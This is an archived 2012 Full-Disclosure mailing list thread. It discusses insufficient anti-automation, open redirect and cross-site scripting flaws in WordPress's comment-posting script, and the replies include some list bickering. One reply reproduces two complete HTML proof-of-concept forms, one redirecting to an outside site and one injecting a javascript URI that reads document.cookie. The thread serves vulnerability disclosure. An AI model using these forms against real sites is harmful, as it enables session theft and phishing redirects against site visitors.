| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 5 May 2012 15:00:36 +0100 From: Benji <me@...ji.com> To: InterN0T Advisories <advisories@...ern0t.net> Cc: full-disclosure@...ts.grok.org.uk, submissions@...ketstormsecurity.org Subject: Re: IAA, Redirector and XSS vulnerabilities in WordPress Wow, yiou're like the jehovahs witnessess of the internet. Stop with the childish bitching and grow up. Last time I checked intern0t was also a script kid breeding ground. On Sat, May 5, 2012 at 2:54 PM, InterN0T Advisories <advisories@...ern0t.net> wrote: > Hi List, > > To stop MustLive's desperate act of trying to get visitors (and more > backlinks) to his website, I have for those that doesn't want to go to > there, just to see the PoC's but actually read them on this mailing list > like almost _every other_ Proof of Concept / exploit, made them available > below. > > Contents of Wordpress Redirector: > <html> > <head> > <title>WordPress Redirector exploit (lol?) (C) 2012 MustLive. > [removed]</title> > </head> > <!-- <body onLoad="document.hack.submit()"> --> > <body> > <form name="hack" action="http://site/wp-comments-post.php" method="post"> > <input type="hidden" name="author" value="Test" /> > <input type="hidden" name="email" value="test@...t.test" /> > <input type="hidden" name="comment" value="Test" /> > <input type="hidden" name="comment_post_ID" value="1" /> > <input type="hidden" name="redirect_to" value="http://awebsite.tld" /> > </form> > </body> > </html> > -------------------------------------- > > Contents of Wordpress XSS: > <html> > <head> > <title>WordPress XSS exploit (lol?) (C) 2012 MustLive. [removed]</title> > </head> > <!-- <body onLoad="document.hack.submit()"> --> > <body> > <form name="hack" action="http://site/wp-comments-post.php" method="post"> > <input type="hidden" name="author" value="Test" /> > <input type="hidden" name="email" value="test@...t.test" /> > <input type="hidden" name="comment" value="Test21" /> > <input type="hidden" name="comment_post_ID" value="1" /> > <input type="hidden" name="redirect_to" > value="javascript:alert%28document.cookie%29//" /> > </form> > </body> > </html> > -------------------------------------- > > I don't really have any comments about these "exploits". > > > > Best regards, > Nemesis 3.0 > > > On Sat, 5 May 2012 16:01:53 +0300, "MustLive" > <mustlive@...security.com.ua> > wrote: >> Hello list! >> >> I want to warn you about security vulnerabilities in WordPress. >> >> These are Insufficient Anti-automation, Redirector and Cross-Site >> Scripting >> vulnerabilities. >> >> ------------------------- >> Affected products: >> ------------------------- >> >> Vulnerable are WordPress 2.0 - 3.3.1. >> >> ---------- >> Details: >> ---------- >> >> Already from WP 2.0 there are Insufficient Anti-automation, Redirector > and >> XSS vulnerabilities in wp-comments-post.php. With IAA I've faced just > when >> begun using WP in 2006. If the developers fixed vulnerabilities in >> previous >> two redirectors in WP 2.3, then these vulnerabilities were not fixed > even >> in >> WP 3.3.1 >> >> IAA (WASC-21): >> >> Lack of captcha in comment form allows to conduct automated attacks. The > >> developers still haven't put captcha in WP comments form (from the first > >> version of engine), which besides IAA attacks, also allowed to conduct >> Redirector and XSS attacks. >> >> By default in WordPress the premoderation is turned on, and also there > is >> built-in anti-spam filter. But if 10 years ago the premoderation would > be >> enough, then long ago this mechanism couldn't be considered as > sufficient >> protection against spam, and anti-spam filter had efficiency less then > 1% >> - >> only few from spam messages he marked as spam. And also these mechanisms > >> don't protect against below-mentioned attacks. Also plugin Akismet is >> bundled with WP, which is "captcha-less" protection against spam. But by > >> default it's turned off and comparing with captcha it's considered as > less >> efficient and also doesn't protect against below-mentioned attacks. >> >> Redirector (URL Redirector Abuse) (WASC-38): >> >> Exploit: >> >> [Removed] >> >> XSS (WASC-08): >> >> Exploit: >> >> [Removed] >> >> XSS attack is possible on different browsers, but it's harder to conduct > >> then in case of previous two redirectors (via data URI). At IIS web >> servers >> the redirect is going via Refresh header, and at other web servers - via > >> Location header. >> >> Due to nuances of work of this script (filtering of important symbols > and >> adding of anchor), for execution of JS code it's needed to use tricky >> bypass >> methods. This complexity exists as with javascript URI, as with combo >> variant javascript URI + data URI. >> >> Reliable captcha protects against IAA, Redirector and XSS > vulnerabilities. >> >> ------------ >> Timeline: >> ------------ >> >> 2012.04.26 - disclosed at my site >> >> Best wishes & regards, >> MustLive >> Administrator of Websecurity web site >> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists